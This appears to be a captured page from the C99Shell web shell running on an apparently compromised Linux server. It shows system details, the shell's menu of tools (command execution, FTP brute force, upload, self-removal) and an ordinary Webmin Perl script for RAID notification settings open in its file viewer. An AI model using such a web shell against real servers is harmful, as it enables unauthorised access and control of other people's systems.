!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/usr/share/webmin/raid/   drwxr-xr-x
Free 28.64 GB of 117.98 GB (24.27%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     save_mdadm.cgi (939 B)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# Update mdadm.conf with notification settings

require './raid-lib.pl';
&ReadParse();
&error_setup($text{'notif_err'});

# Validate inputs
$notif = { };
if (!$in{'mailaddr_def'}) {
    $in{'mailaddr'} =~ /^\S+\@\S+$/ || &error($text{'notif_emailaddr'});
    $notif->{'MAILADDR'} = $in{'mailaddr'};
    }
else {
    $notif->{'MAILADDR'} = undef;
    }
if (!$in{'mailfrom_def'}) {
    $in{'mailfrom'} =~ /^\S+\@\S+$/ || &error($text{'notif_emailfrom'});
    $notif->{'MAILFROM'} = $in{'mailfrom'};
    }
else {
    $notif->{'MAILFROM'} = undef;
    }
if (!$in{'program_def'}) {
    -x $in{'program'} || &error($text{'notif_eprogram'});
    $notif->{'PROGRAM'} = $in{'program'};
    }
else {
    $notif->{'PROGRAM'} = undef;
    }

# Save them
&lock_file($config{'mdadm'});
&save_mdadm_notifications($notif);
&unlock_file($config{'mdadm'});

# Enable/disable
if (&get_mdadm_action()) {
    &save_mdadm_monitoring($in{'monitor'});
    }

&webmin_log("notif");

&redirect("");


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0035 ]--